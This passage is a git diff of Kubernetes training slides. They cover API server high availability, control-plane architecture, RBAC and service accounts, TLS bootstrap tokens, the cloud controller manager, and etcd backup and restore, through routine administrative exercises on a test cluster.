-  - containers/Docker_Machine.md
- - containers/Advanced_Dockerfiles.md
-  - containers/Application_Configuration.md
-  - containers/Logging.md
-  - containers/Resource_Limits.md
- - containers/Namespaces_Cgroups.md
-  - containers/Copy_On_Write.md
-  #- containers/Containers_From_Scratch.md
- - containers/Container_Engines.md
-  - containers/Ecosystem.md
-  - containers/Orchestration_Overview.md
-  - shared/thankyou.md
-  - containers/links.md
--- a/slides/k8s/apilb.md
+++ b/slides/k8s/apilb.md
@@ -0,0 +1,89 @@
+# API server availability
+
+- When we set up a node, we need the address of the API server:
+
+  - for kubelet
+
+  - for kube-proxy
+
+  - sometimes for the pod network system (like kube-router)
+
+- How do we ensure the availability of that endpoint?
+
+  (what if the node running the API server goes down?)
+
+---
+
+## Option 1: external load balancer
+
+- Set up an external load balancer
+
+- Point kubelet (and other components) to that load balancer
+
+- Put the node(s) running the API server behind that load balancer
+
+- Update the load balancer if/when an API server node needs to be replaced
+
+- On cloud infrastructures, some mechanisms provide automation for this
+
+  (e.g. on AWS, an Elastic Load Balancer + Auto Scaling Group)
+
+- [Example in Kubernetes The Hard Way](https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/08-bootstrapping-kubernetes-controllers.md#the-kubernetes-frontend-load-balancer)
+
+---
+
+## Option 2: local load balancer
+
+- Set up a load balancer (like NGINX, HAProxy...) on *each* node
+
+- Configure that load balancer to send traffic to the API server node(s)
+
+- Point kubelet (and other components) to `localhost`
+
+- Update the load balancer configuration when API server nodes are updated
+
+---
+
+## Updating the local load balancer config
+
+- Distribute the updated configuration (push)
+
+- Or regularly check for updates (pull)
+
+- The latter requires an external, highly available store
+ 
+  (it could be an object store, an HTTP server, or even DNS...)
+
+- Updates can be facilitated by a DaemonSet
+
+  (but remember that it can't be used when installing a new node!)
+
+---
+
+## Option 3: DNS records
+
+- Put all the API server nodes behind a round-robin DNS
+
+- Point kubelet (and other components) to that name
+
+- Update the records when needed
+
+- Note: this option is not officially supported
+
+  (but since kubelet supports reconnection anyway, it *should* work)
+
+---
+
+## Option 4: ....................
+
+- Many managed clusters expose a high-availability API endpoint
+
+  (and you don't have to worry about it)
+
+- You can also use HA mechanisms that you're familiar with
+
+  (e.g. virtual IPs)
+
+- Tunnels are also fine
+
+  (e.g. [k3s](https://k3s.io/) uses a tunnel to allow each node to contact the API server)
--- a/slides/k8s/architecture.md
+++ b/slides/k8s/architecture.md
@@ -0,0 +1,383 @@
+# Kubernetes architecture
+
+We can arbitrarily split Kubernetes in two parts:
+
+- the *nodes*, a set of machines that run our containerized workloads;
+
+- the *control plane*, a set of processes implementing the Kubernetes APIs.
+
+Kubernetes also relies on underlying infrastructure:
+
+- servers, network connectivity (obviously!),
+
+- optional components like storage systems, load balancers ...
+
+---
+
+## Control plane location
+
+The control plane can run:
+
+- in containers, on the same nodes that run other application workloads
+
+  (example: Minikube; 1 node runs everything)
+
+- on a dedicated node
+
+  (example: a cluster installed with kubeadm)
+
+- on a dedicated set of nodes
+
+  (example: Kubernetes The Hard Way; kops)
+
+- outside of the cluster
+
+  (example: most managed clusters like AKS, EKS, GKE)
+
+---
+
+class: pic
+
+![Kubernetes architecture diagram: control plane and nodes](images/k8s-arch2.png)
+
+---
+
+## What runs on a node
+
+- Our containerized workloads
+
+- A container engine like Docker, CRI-O, containerd...
+
+  (in theory, the choice doesn't matter, as the engine is abstracted by Kubernetes)
+
+- kubelet: an agent connecting the node to the cluster
+
+  (it connects to the API server, registers the node, receives instructions)
+
+- kube-proxy: a component used for internal cluster communication
+
+  (note that this is *not* an overlay network or a CNI plugin!)
+
+---
+
+## What's in the control plane
+
+- Everything is stored in etcd
+
+  (it's the only stateful component)
+
+- Everyone communicates exclusively through the API server:
+
+  - we (users) interact with the cluster through the API server
+
+  - the nodes register and get their instructions through the API server
+
+  - the other control plane components also register with the API server
+
+- API server is the only component that reads/writes from/to etcd
+
+---
+
+## Communication protocols: API server
+
+- The API server exposes a REST API
+
+  (except for some calls, e.g. to attach interactively to a container)
+
+- Almost all requests and responses are JSON following a strict format
+
+- For performance, the requests and responses can also be done over protobuf
+
+  (see this [design proposal](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md) for details)
+
+- In practice, protobuf is used for all internal communication
+
+  (between control plane components, and with kubelet)
+
+---
+
+## Communication protocols: on the nodes
+
+The kubelet agent uses a number of special-purpose protocols and interfaces, including:
+
+- CRI (Container Runtime Interface)
+
+  - used for communication with the container engine
+  - abstracts the differences between container engines
+  - based on gRPC+protobuf
+
+- [CNI (Container Network Interface)](https://github.com/containernetworking/cni/blob/master/SPEC.md)
+
+  - used for communication with network plugins
+  - network plugins are implemented as executable programs invoked by kubelet
+  - network plugins provide IPAM
+  - network plugins set up network interfaces in pods
+
+---
+
+class: pic
+
+![Kubernetes architecture diagram: communication between components](images/k8s-arch4-thanks-luxas.png)
+
+---
+
+# The Kubernetes API
+
+[
+*The Kubernetes API server is a "dumb server" which offers storage, versioning, validation, update, and watch semantics on API resources.*
+](
+https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md#proposal-and-motivation
+)
+
+([Clayton Coleman](https://twitter.com/smarterclayton), Kubernetes Architect and Maintainer)
+
+What does that mean?
+
+---
+
+## The Kubernetes API is declarative
+
+- We cannot tell the API, "run a pod"
+
+- We can tell the API, "here is the definition for pod X"
+
+- The API server will store that definition (in etcd)
+
+- *Controllers* will then wake up and create a pod matching the definition
+
+---
+
+## The core features of the Kubernetes API
+
+- We can create, read, update, and delete objects
+
+- We can also *watch* objects
+
+  (be notified when an object changes, or when an object of a given type is created)
+
+- Objects are strongly typed
+
+- Types are *validated* and *versioned*
+
+- Storage and watch operations are provided by etcd
+
+  (note: the [k3s](https://k3s.io/) project allows us to use sqlite instead of etcd)
+
+---
+
+## Let's experiment a bit!
+
+- For the exercises in this section, connect to the first node of the `test` cluster
+
+.exercise[
+
+- SSH to the first node of the test cluster
+
+- Check that the cluster is operational:
+  ```bash
+  kubectl get nodes
+  ```
+
+- All nodes should be `Ready`
+
+]
+
+---
+
+## Create
+
+- Let's create a simple object
+
+.exercise[
+
+- Create a namespace with the following command:
+  ```bash
+    kubectl create -f- <<EOF
+    apiVersion: v1
+    kind: Namespace
+    metadata:
+      name: hello
+    EOF
+  ```
+
+]
+
+This is equivalent to `kubectl create namespace hello`.
+
+---
+
+## Read
+
+- Let's retrieve the object we just created
+
+.exercise[
+
+- Read back our object:
+  ```bash
+  kubectl get namespace hello -o yaml
+  ```
+
+]
+
+We see a lot of data that wasn't here when we created the object.
+
+Some data was automatically added to the object (like `spec.finalizers`).
+
+Some data is dynamic (typically, the content of `status`.)
+
+---
+
+## API requests and responses
+
+- Almost every Kubernetes API payload (requests and responses) has the same format:
+  ```yaml
+    apiVersion: xxx
+    kind: yyy
+    metadata:
+      name: zzz
+      (more metadata fields here)
+    (more fields here)
+  ```
+
+- The fields shown above are mandatory, except for some special cases
+
+  (e.g.: in lists of resources, the list itself doesn't have a `metadata.name`)
+
+- We show YAML for convenience, but the API uses JSON
+
+  (with optional protobuf encoding)
+
+---
+
+class: extra-details
+
+## API versions
+
+- The `apiVersion` field corresponds to an *API group*
+
+- It can be either `v1` (aka "core" group or "legacy group"), or `group/versions`; e.g.:
+
+  - `apps/v1`
+  - `rbac.authorization.k8s.io/v1`
+  - `extensions/v1beta1`
+
+- It does not indicate which version of Kubernetes we're talking about
+
+- It *indirectly* indicates the version of the `kind`
+
+  (which fields exist, their format, which ones are mandatory...)
+
+- A single resource type (`kind`) is rarely versioned alone
+
+  (e.g.: the `batch` API group contains `jobs` and `cronjobs`)
+
+---
+
+## Update
+
+- Let's update our namespace object
+
+- There are many ways to do that, including:
+
+  - `kubectl apply` (and provide an updated YAML file)
+  - `kubectl edit`
+  - `kubectl patch`
+  - many helpers, like `kubectl label`, or `kubectl set`
+
+- In each case, `kubectl` will:
+
+  - get the current definition of the object
+  - compute changes
+  - submit the changes (with `PATCH` requests)
+
+---
+
+## Adding a label
+
+- For demonstration purposes, let's add a label to the namespace
+
+- The easiest way is to use `kubectl label`
+
+.exercise[
+
+- In one terminal, watch namespaces:
+  ```bash
+  kubectl get namespaces --show-labels -w
+  ```
+
+- In the other, update our namespace:
+  ```bash
+  kubectl label namespaces hello color=purple
+  ```
+
+]
+
+We demonstrated *update* and *watch* semantics.
+
+---
+
+## What's special about *watch*?
+
+- The API server itself doesn't do anything: it's just a fancy object store
+
+- All the actual logic in Kubernetes is implemented with *controllers*
+
+- A *controller* watches a set of resources, and takes action when they change
+
+- Examples:
+
+  - when a Pod object is created, it gets scheduled and started
+
+  - when a Pod belonging to a ReplicaSet terminates, it gets replaced
+
+  - when a Deployment object is updated, it can trigger a rolling update
+
+---
+
+# Other control plane components
+
+- API server ✔️
+
+- etcd ✔️
+
+- Controller manager
+
+- Scheduler
+
+---
+
+## Controller manager
+
+- This is a collection of loops watching all kinds of objects
+
+- That's where the actual logic of Kubernetes lives
+
+- When we create a Deployment (e.g. with `kubectl run web --image=nginx`),
+
+  - we create a Deployment object
+
+  - the Deployment controller notices it, and creates a ReplicaSet
+
+  - the ReplicaSet controller notices the ReplicaSet, and creates a Pod
+
+---
+
+## Scheduler
+
+- When a pod is created, it is in `Pending` state
+
+- The scheduler (or rather: *a scheduler*) must bind it to a node
+
+  - Kubernetes comes with an efficient scheduler with many features
+
+  - if we have special requirements, we can add another scheduler
+    <br/>
+    (example: this [demo scheduler](https://github.com/kelseyhightower/scheduler) uses the cost of nodes, stored in node annotations)
+
+- A pod might stay in `Pending` state for a long time:
+
+  - if the cluster is full
+
+  - if the pod has special constraints that can't be met
+
+  - if the scheduler is not running (!)
--- a/slides/k8s/authn-authz.md
+++ b/slides/k8s/authn-authz.md
@@ -22,7 +22,7 @@

 - When the API server receives a request, it tries to authenticate it

-  (it examines headers, certificates ... anything available)
+  (it examines headers, certificates... anything available)

 - Many authentication methods are available and can be used simultaneously

@@ -34,7 +34,7 @@
  - the user ID
  - a list of groups

- The API server doesn't interpret these; it'll be the job of *authorizers*
+- The API server doesn't interpret these; that'll be the job of *authorizers*

 ---

@@ -50,7 +50,7 @@

 - [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)

-  (carrying user and password in a HTTP header)
+  (carrying user and password in an HTTP header)

 - Authentication proxy

@@ -88,7 +88,7 @@

  (i.e. they are not stored in etcd or anywhere else)

- Users can be created (and given membership to groups) independently of the API
+- Users can be created (and added to groups) independently of the API

 - The Kubernetes API can be set up to use your custom CA to validate client certs

@@ -143,19 +143,21 @@ class: extra-details

  (see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))

- As a result, we cannot easily suspend a user's access
+- As a result, we don't have an easy way to terminate someone's access

- There are workarounds, but they are very inconvenient:
+  (if their key is compromised, or they leave the organization)

-  - issue short-lived certificates (e.g. 24 hours) and regenerate them often
+- Option 1: re-create a new CA and re-issue everyone's certificates 
+  <br/>
+  → Maybe OK if we only have a few users; no way otherwise

-  - re-create the CA and re-issue all certificates in case of compromise
+- Option 2: don't use groups; grant permissions to individual users
+  <br/>
+  → Inconvenient if we have many users and teams; error-prone

-  - grant permissions to individual users, not groups
-    <br/>
-    (and remove all permissions to a compromised user)
-
- Until this is fixed, we probably want to use other methods
+- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
+  <br/>
+  → This can be facilitated by e.g. Vault or by the Kubernetes CSR API

 ---

@@ -191,7 +193,7 @@ class: extra-details

  (the kind that you can view with `kubectl get secrets`)

- Service accounts are generally used to grant permissions to applications, services ...
+- Service accounts are generally used to grant permissions to applications, services...

  (as opposed to humans)

@@ -215,7 +217,7 @@ class: extra-details

 .exercise[

- The resource name is `serviceaccount` or `sa` in short:
+- The resource name is `serviceaccount` or `sa` for short:
  ```bash
  kubectl get sa
  ```
@@ -307,7 +309,7 @@ class: extra-details

 - The API "sees" us as a different user

- But neither user has any right, so we can't do nothin'
+- But neither user has any rights, so we can't do nothin'

 - Let's change that!

@@ -337,9 +339,9 @@ class: extra-details

 - A rule is a combination of:

-  - [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete ...
+  - [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...

-  - resources (as in "API resource", like pods, nodes, services ...)
+  - resources (as in "API resource," like pods, nodes, services...)

  - resource names (to specify e.g. one specific pod instead of all pods)

@@ -373,13 +375,13 @@ class: extra-details

 - We can also define API resources ClusterRole and ClusterRoleBinding

- These are a superset, allowing to:
+- These are a superset, allowing us to:

  - specify actions on cluster-wide objects (like nodes)

  - operate across all namespaces

- We can create Role and RoleBinding resources within a namespaces
+- We can create Role and RoleBinding resources within a namespace

 - ClusterRole and ClusterRoleBinding resources are global

@@ -387,13 +389,13 @@ class: extra-details

 ## Pods and service accounts

- A pod can be associated to a service account
+- A pod can be associated with a service account

-  - by default, it is associated to the `default` service account
+  - by default, it is associated with the `default` service account

-  - as we've seen earlier, this service account has no permission anyway
+  - as we saw earlier, this service account has no permissions anyway

- The associated token is exposed into the pod's filesystem
+- The associated token is exposed to the pod's filesystem

  (in `/var/run/secrets/kubernetes.io/serviceaccount/token`)

@@ -407,7 +409,7 @@ class: extra-details

 - We are going to create a service account

- We will use an existing cluster role (`view`)
+- We will use a default cluster role (`view`)

 - We will bind together this role and this service account

@@ -458,7 +460,7 @@ class: extra-details

 ]

-It's important to note a couple of details in these flags ...
+It's important to note a couple of details in these flags...

 ---

@@ -491,13 +493,13 @@ It's important to note a couple of details in these flags ...

  - again, the command would have worked fine (no error)

-  - ... but our API requests would have been denied later
+  - ...but our API requests would have been denied later

 - What's about the `default:` prefix?

  - that's the namespace of the service account

-  - yes, it could be inferred from context, but ... `kubectl` requires it
+  - yes, it could be inferred from context, but... `kubectl` requires it

 ---

@@ -574,6 +576,51 @@ It's important to note a couple of details in these flags ...

 class: extra-details

+## Where does this `view` role come from?
+
+- Kubernetes defines a number of ClusterRoles intended to be bound to users
+
+- `cluster-admin` can do *everything* (think `root` on UNIX)
+
+- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
+
+- `edit` is similar to `admin`, but cannot view or edit permissions
+
+- `view` has read-only access to most resources, except permissions and secrets
+
+*In many situations, these roles will be all you need.*
+
+*You can also customize them!*
+
+---
+
+class: extra-details
+
+## Customizing the default roles
+
+- If you need to *add* permissions to these default roles (or others),
+  <br/>
+  you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
+
+- This happens by creating a ClusterRole with the following labels:
+  ```yaml
+    metadata:
+      labels:
+        rbac.authorization.k8s.io/aggregate-to-admin: "true"
+        rbac.authorization.k8s.io/aggregate-to-edit: "true"
+        rbac.authorization.k8s.io/aggregate-to-view: "true"
+  ```
+
+- This ClusterRole permissions will be added to `admin`/`edit`/`view` respectively
+
+- This is particulary useful when using CustomResourceDefinitions
+
+  (since Kubernetes cannot guess which resources are sensitive and which ones aren't)
+
+---
+
+class: extra-details
+
 ## Where do our permissions come from?

 - When interacting with the Kubernetes API, we are using a client certificate
@@ -605,7 +652,7 @@ class: extra-details
  kubectl describe clusterrolebinding cluster-admin
  ```

- This binding associates `system:masters` to the cluster role `cluster-admin`
+- This binding associates `system:masters` with the cluster role `cluster-admin`

 - And the `cluster-admin` is, basically, `root`:
  ```bash
@@ -620,7 +667,7 @@ class: extra-details

 - For auditing purposes, sometimes we want to know who can perform an action

- Here is a proof-of-concept tool by Aqua Security, doing exactly that:
+- There is a proof-of-concept tool by Aqua Security which does exactly that:

  https://github.com/aquasecurity/kubectl-who-can

--- a/slides/k8s/bootstrap.md
+++ b/slides/k8s/bootstrap.md
@@ -0,0 +1,259 @@
+# TLS bootstrap
+
+- kubelet needs TLS keys and certificates to communicate with the control plane
+
+- How do we generate this information?
+
+- How do we make it available to kubelet?
+
+---
+
+## Option 1: push
+
+- When we want to provision a node:
+
+  - generate its keys, certificate, and sign centrally
+
+  - push the files to the node
+
+- OK for "traditional", on-premises deployments
+
+- Not OK for cloud deployments with auto-scaling
+
+---
+
+## Option 2: poll + push
+
+- Discover nodes when they are created
+
+  (e.g. with cloud API)
+
+- When we detect a new node, push TLS material to the node
+
+  (like in option 1)
+
+- It works, but:
+
+  - discovery code is specific to each provider
+
+  - relies heavily on the cloud provider API
+
+  - doesn't work on-premises
+
+  - doesn't scale
+
+---
+
+## Option 3: bootstrap tokens + CSR API
+
+- Since Kubernetes 1.4, the Kubernetes API supports CSR
+
+  (Certificate Signing Requests)
+
+- This is similar to the protocol used to obtain e.g. HTTPS certificates:
+
+  - subject (here, kubelet) generates TLS keys and CSR
+
+  - subject submits CSR to CA
+
+  - CA validates (or not) the CSR
+
+  - CA sends back signed certificate to subject
+
+- This is combined with *bootstrap tokens*
+
+---
+
+## Bootstrap tokens
+
+- A [bootstrap token](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/) is an API access token
+
+  - it is a Secret with type `bootstrap.kubernetes.io/token`
+
+  - it is 6 public characters (ID) + 16 secret characters
+    <br/>(example: `whd3pq.d1ushuf6ccisjacu`)
+
+  - it gives access to groups `system:bootstrap:<ID>` and `system:bootstrappers`
+   
+   - additional groups can be specified in the Secret
+
+---
+
+## Bootstrap tokens with kubeadm
+
+- kubeadm automatically creates a bootstrap token
+
+  (it is shown at the end of `kubeadm init`)
+
+- That token adds the group `system:bootstrappers:kubeadm:default-node-token`
+
+- kubeadm also creates a ClusterRoleBinding `kubeadm:kubelet-bootstrap`
+  <br/>binding `...:default-node-token` to ClusterRole `system:node-bootstrapper`
+
+- That ClusterRole gives create/get/list/watch permissions on the CSR API
+
+---
+
+## Bootstrap tokens in practice
+
+- Let's list our bootstrap tokens on a cluster created with kubeadm
+
+.exercise[
+
+- Log into node `test1`
+
+- View bootstrap tokens:
+  ```bash
+  sudo kubeadm token list
+  ```
+
+]
+
+- Tokens are short-lived
+
+- We can create new tokens with `kubeadm` if necessary
+
+---
+
+class: extra-details
+
+## Retrieving bootstrap tokens with kubectl
+
+- Bootstrap tokens are Secrets with type `bootstrap.kubernetes.io/token`
+
+- Token ID and secret are in data fields `token-id` and `token-secret`
+
+- In Secrets, data fields are encoded with Base64
+
+- This "very simple" command will show us the tokens:
+
+```
+kubectl -n kube-system get secrets -o json | 
+        jq -r '.items[] 
+        | select(.type=="bootstrap.kubernetes.io/token")
+        | ( .data["token-id"] + "Lg==" + .data["token-secret"] + "Cg==")
+        ' | base64 -d
+```
+
+(On recent versions of `jq`, you can simplify by using filter `@base64d`.)
+
+---
+
+class: extra-details
+
+## Using a bootstrap token
+
+- The token we need to use has the form `abcdef.1234567890abcdef`
+
+.exercise[
+
+- Check that it is accepted by the API server:
+  ```bash
+  curl -k -H "Authorization: Bearer abcdef.1234567890abcdef"
+  ```
+
+- We should see that we are *authenticated* but not *authorized*:
+  ```
+  User \"system:bootstrap:abcdef\" cannot get path \"/\""
+  ```
+
+- Check that we can access the CSR API:
+  ```bash
+  curl -k -H "Authorization: Bearer abcdef.1234567890abcdef" \
+       https://10.96.0.1/apis/certificates.k8s.io/v1beta1/certificatesigningrequests
+  ```
+
+]
+
+---
+
+## The cluster-info ConfigMap
+
+- Before we can talk to the API, we need:
+
+  - the API server address (obviously!)
+
+  - the cluster CA certificate
+
+- That information is stored in a public ConfigMap
+
+.exercise[
+
+- Retrieve that ConfigMap:
+  ```bash
+  curl -k https://10.96.0.1/api/v1/namespaces/kube-public/configmaps/cluster-info
+  ```
+
+]
+
+*Extracting the kubeconfig file is left as an exercise for the reader.*
+
+---
+
+class: extra-details
+
+## Signature of the config-map
+
+- You might have noticed a few `jws-kubeconfig-...` fields
+
+- These are config-map signatures
+
+  (so that the client can protect against MITM attacks)
+
+- These are JWS signatures using HMAC-SHA256
+
+  (see [here](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/#configmap-signing) for more details)
+
+---
+
+## Putting it all together
+
+This is the TLS bootstrap mechanism, step by step.
+
+- The node uses the cluster-info ConfigMap to get the cluster CA certificate
+
+- The node generates its keys and CSR
+
+- Using the bootstrap token, the node creates a CertificateSigningRequest object
+
+- The node watches the CSR object
+
+- The CSR object is accepted (automatically or by an admin)
+
+- The node gets notified, and retrieves the certificate
+
+- The node can now join the cluster
+
+---
+
+## Bottom line
+
+- If you paid attention, we still need a way to:
+
+  - either safely get the bootstrap token to the nodes
+
+  - or disable auto-approval and manually approve the nodes when they join
+
+- The goal of the TLS bootstrap mechanism is *not* to solve this
+
+  (in terms of information knowledge, it's fundamentally impossible!)
+
+- But it reduces the differences between environments, infrastructures, providers ...
+
+- It gives a mechanism that is easier to use, and flexible enough, for most scenarios
+
+---
+
+## More information
+
+- As always, the Kubernetes documentation has extra details:
+
+  - [TLS management](https://kubernetes.io/docs/tasks/tls/managing-tls-in-a-cluster/)
+
+  - [Authenticating with bootstrap tokens](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/)
+
+  - [TLS bootstrapping](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/)
+
+  - [kubeadm token](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-token/) command
+
+  - [kubeadm join](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/) command (has details about [the join workflow](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/#join-workflow))
--- a/slides/k8s/cloud-controller-manager.md
+++ b/slides/k8s/cloud-controller-manager.md
@@ -0,0 +1,144 @@
+# The Cloud Controller Manager
+
+- Kubernetes has many features that are cloud-specific
+
+  (e.g. providing cloud load balancers when a Service of type LoadBalancer is created)
+
+- These features were initially implemented in API server and controller manager
+
+- Since Kubernetes 1.6, these features are available through a separate process:
+
+  the *Cloud Controller Manager*
+
+- The CCM is optional, but if we run in a cloud, we probably want it!
+
+---
+
+## Cloud Controller Manager duties
+
+- Creating and updating cloud load balancers
+
+- Configuring routing tables in the cloud network (specific to GCE)
+
+- Updating node labels to indicate region, zone, instance type...
+
+- Obtain node name, internal and external addresses from cloud metadata service
+
+- Deleting nodes from Kubernetes when they're deleted in the cloud
+
+- Managing *some* volumes (e.g. ELBs, AzureDisks...)
+
+  (Eventually, volumes will be managed by the Container Storage Interface)
+
+---
+
+## In-tree vs. out-of-tree
+
+- A number of cloud providers are supported "in-tree"
+
+  (in the main kubernetes/kubernetes repository on GitHub)
+
+- More cloud providers are supported "out-of-tree"
+
+  (with code in different repositories)
+
+- There is an [ongoing effort](https://github.com/kubernetes/kubernetes/tree/master/pkg/cloudprovider) to move everything to out-of-tree providers
+
+---
+
+## In-tree providers
+
+The following providers are actively maintained:
+
+- Amazon Web Services
+- Azure
+- Google Compute Engine
+- IBM Cloud
+- OpenStack
+- VMware vSphere
+
+These ones are less actively maintained:
+
+- Apache CloudStack
+- oVirt
+- VMware Photon
+
+---
+
+## Out-of-tree providers
+
+The list includes the following providers:
+
+- DigitalOcean
+
+- keepalived (not exactly a cloud; provides VIPs for load balancers)
+
+- Linode
+
+- Oracle Cloud Infrastructure
+
+(And possibly others; there is no central registry for these.)
+
+---
+
+## Audience questions
+
+- What kind of clouds are you using/planning to use?
+
+- What kind of details would you like to see in this section?
+
+- Would you appreciate details on clouds that you don't / won't use?
+
+---
+
+## Cloud Controller Manager in practice
+
+- Write a configuration file
+
+  (typically `/etc/kubernetes/cloud.conf`)
+
+- Run the CCM process
+
+  (on self-hosted clusters, this can be a DaemonSet selecting the control plane nodes)
+
+- Start kubelet with `--cloud-provider=external`
+
+- When using managed clusters, this is done automatically
+
+- There is very little documentation on writing the configuration file
+
+  (except for OpenStack)
+
+---
+
+## Bootstrapping challenges
+
+- When a node joins the cluster, it needs to obtain a signed TLS certificate
+
+- That certificate must contain the node's addresses
+
+- These addresses are provided by the Cloud Controller Manager
+
+  (at least the external address)
+
+- To get these addresses, the node needs to communicate with the control plane
+
+- ...Which means joining the cluster
+
+(The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)
+
+---
+
+## More information about CCM
+
+- CCM configuration and operation is highly specific to each cloud provider
+
+  (which is why this section remains very generic)
+
+- The Kubernetes documentation has *some* information:
+
+  - [architecture and diagrams](https://kubernetes.io/docs/concepts/architecture/cloud-controller/)
+
+  - [configuration](https://kubernetes.io/docs/concepts/cluster-administration/cloud-providers/) (mainly for OpenStack)
+
+  - [deployment](https://kubernetes.io/docs/tasks/administer-cluster/running-cloud-controller/)
--- a/slides/k8s/cluster-backup.md
+++ b/slides/k8s/cluster-backup.md
@@ -0,0 +1,362 @@
+# Backing up clusters
+
+- Backups can have multiple purposes:
+
+  - disaster recovery (servers or storage are destroyed or unreachable)
+
+  - error recovery (human or process has altered or corrupted data)
+
+  - cloning environments (for testing, validation...)
+
+- Let's see the strategies and tools available with Kubernetes!
+
+---
+
+## Important
+
+- Kubernetes helps us with disaster recovery
+
+  (it gives us replication primitives)
+
+- Kubernetes helps us clone / replicate environments
+
+  (all resources can be described with manifests)
+
+- Kubernetes *does not* help us with error recovery
+
+- We still need to back up/snapshot our data:
+
+  - with database backups (mysqldump, pgdump, etc.)
+
+  - and/or snapshots at the storage layer
+
+  - and/or traditional full disk backups
+
+---
+
+## In a perfect world ...
+
+- The deployment of our Kubernetes clusters is automated
+
+  (recreating a cluster takes less than a minute of human time)
+
+- All the resources (Deployments, Services...) on our clusters are under version control
+
+  (never use `kubectl run`; always apply YAML files coming from a repository)
+
+- Stateful components are either:
+
+  - stored on systems with regular snapshots
+
+  - backed up regularly to an external, durable storage
+
+  - outside of Kubernetes
+
+---
+
+## Kubernetes cluster deployment
+
+- If our deployment system isn't fully automated, it should at least be documented
+
+- Litmus test: how long does it take to deploy a cluster...
+
+  - for a senior engineer?
+
+  - for a new hire?
+
+- Does it require external intervention?
+
+  (e.g. provisioning servers, signing TLS certs...)
+
+---
+
+## Plan B
+
+- Full machine backups of the control plane can help
+
+- If the control plane is in pods (or containers), pay attention to storage drivers
+
+  (if the backup mechanism is not container-aware, the backups can take way more resources than they should, or even be unusable!)
+
+- If the previous sentence worries you:
+
+  **automate the deployment of your clusters!**
+
+---
+
+## Managing our Kubernetes resources
+
+- Ideal scenario:
+
+  - never create a resource directly on a cluster
+
+  - push to a code repository
+
+  - a special branch (`production` or even `master`) gets automatically deployed
+
+- Some folks call this "GitOps"
+
+  (it's the logical evolution of configuration management and infrastructure as code)
+
+---
+
+## GitOps in theory
+
+- What do we keep in version control?
+
+- For very simple scenarios: source code, Dockerfiles, scripts
+
+- For real applications: add resources (as YAML files)
+
+- For applications deployed multiple times: Helm, Kustomize...
+
+  (staging and production count as "multiple times")
+
+---
+
+## GitOps tooling
+
+- Various tools exist (Weave Flux, GitKube...)
+
+- These tools are still very young
+
+- You still need to write YAML for all your resources
+
+- There is no tool to:
+
+  - list *all* resources in a namespace
+
+  - get resource YAML in a canonical form
+
+  - diff YAML descriptions with current state
+
+---
+
+## GitOps in practice
+
+- Start describing your resources with YAML
+
+- Leverage a tool like Kustomize or Helm
+
+- Make sure that you can easily deploy to a new namespace
+
+  (or even better: to a new cluster)
+
+- When tooling matures, you will be ready
+
+---
+
+## Plan B
+
+- What if we can't describe everything with YAML?
+
+- What if we manually create resources and forget to commit them to source control?
+
+- What about global resources, that don't live in a namespace?
+
+- How can we be sure that we saved *everything*?
+
+---
+
+## Backing up etcd
+
+- All objects are saved in etcd
+
+- etcd data should be relatively small
+
+  (and therefore, quick and easy to back up)
+
+- Two options to back up etcd:
+
+  - snapshot the data directory
+
+  - use `etcdctl snapshot`
+
+---
+
+## Making an etcd snapshot
+
+- The basic command is simple:
+  ```bash
+  etcdctl snapshot save <filename>
+  ```
+
+- But we also need to specify:
+
+  - an environment variable to specify that we want etcdctl v3
+
+  - the address of the server to back up
+
+  - the path to the key, certificate, and CA certificate
+    <br/>(if our etcd uses TLS certificates)
+
+---
+
+## Snapshotting etcd on kubeadm
+
+- The following command will work on clusters deployed with kubeadm
+
+  (and maybe others)
+
+- It should be executed on a master node
+
+```bash
+docker run --rm --net host -v $PWD:/vol \
+    -v /etc/kubernetes/pki/etcd:/etc/kubernetes/pki/etcd:ro \
+    -e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
+    etcdctl --endpoints=https://[127.0.0.1]:2379 \
+            --cacert=/etc/kubernetes/pki/etcd/ca.crt \
+            --cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt \
+            --key=/etc/kubernetes/pki/etcd/healthcheck-client.key \
+            snapshot save /vol/snapshot
+```
+
+- It will create a file named `snapshot` in the current directory
+
+---
+
+## How can we remember all these flags?
+
+- Look at the static pod manifest for etcd
+
+  (in `/etc/kubernetes/manifests`)
+
+- The healthcheck probe is calling `etcdctl` with all the right flags 
+  😉👍✌️
+
+- Exercise: write the YAML for a batch job to perform the backup
+
+---
+
+## Restoring an etcd snapshot
+
+- ~~Execute exactly the same command, but replacing `save` with `restore`~~
+
+  (Believe it or not, doing that will *not* do anything useful!)
+
+- The `restore` command does *not* load a snapshot into a running etcd server
+
+- The `restore` command creates a new data directory from the snapshot
+
+  (it's an offline operation; it doesn't interact with an etcd server)
+
+- It will create a new data directory in a temporary container
+
+  (leaving the running etcd node untouched)
+
+---
+
+## When using kubeadm
+
+1. Create a new data directory from the snapshot:
+   ```bash
+   sudo rm -rf /var/lib/etcd
+   docker run --rm -v /var/lib:/var/lib -v $PWD:/vol \
+          -e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
+          etcdctl snapshot restore /vol/snapshot --data-dir=/var/lib/etcd
+   ```
+
+2. Provision the control plane, using that data directory:
+   ```bash
+   sudo kubeadm init \
